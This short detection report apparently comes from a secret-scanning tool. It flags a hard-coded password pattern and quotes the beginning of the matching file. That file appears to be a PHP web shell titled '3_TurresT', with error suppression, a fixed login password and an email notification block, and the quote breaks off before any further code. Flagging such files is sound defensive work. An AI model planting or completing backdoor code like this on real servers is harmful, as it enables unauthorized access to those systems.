Detected 1 occurrence(s) of ‘\s*pass[word]+\s*[:=]\s*["'][a-z0-9\-_\!\$]+["']‘: <html> <title>3_TurresT</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <?php @set_time_limit(0); @error_reporting(0); @session_start(); @set_time_limit(0); @$pass = $_POST['pass']; $chk_login = true; $password = "mypassword"; //password // mail $to = "email@example.com"; //email $sub = "~~ WARNNING! ~~"; //Email subject of the email $date = date('Y-m-d H:i:s'); // link $url = 'http'; if ($_SERVER["HTTPS"] == […]
↧